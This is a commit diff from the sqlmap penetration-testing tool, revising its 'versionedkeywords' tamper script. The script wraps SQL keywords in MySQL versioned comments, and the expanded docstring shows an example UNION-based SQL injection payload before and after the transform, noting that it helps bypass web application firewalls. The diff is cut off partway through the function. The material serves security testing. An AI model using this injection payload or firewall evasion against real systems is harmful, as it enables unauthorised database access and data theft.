Revamp of tamper scripts, now supporting dependencies() function as well. Improved a lot the docstring and retested all. Added a new one from Ahmad too.

2025-12-25 08:59:02 +00:00 · 2011-07-06 21:04:45 +00:00
parent 0d28c1e9e7
commit 23b4efdcaf
18 changed files with 399 additions and 45 deletions
--- a/tamper/versionedkeywords.py
+++ b/tamper/versionedkeywords.py
@@ -7,18 +7,38 @@ Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """

+import os
 import re

-from lib.core.common import randomRange
+from lib.core.common import singleTimeWarnMessage
 from lib.core.data import kb
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY

 __priority__ = PRIORITY.HIGHER

+def dependencies():
+    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
+
 def tamper(payload):
    """
    Encloses each non-function keyword with versioned MySQL comment
-    Example: 'INSERT' will become '/*!INSERT*/'
+
+    Example:
+        * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
+        * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 4.0.18
+        * MySQL 5.1.56
+        * MySQL 5.5.11
+
+    Notes:
+        * Useful to bypass several web application firewalls when the
+          back-end database management system is MySQL
    """

    def process(match):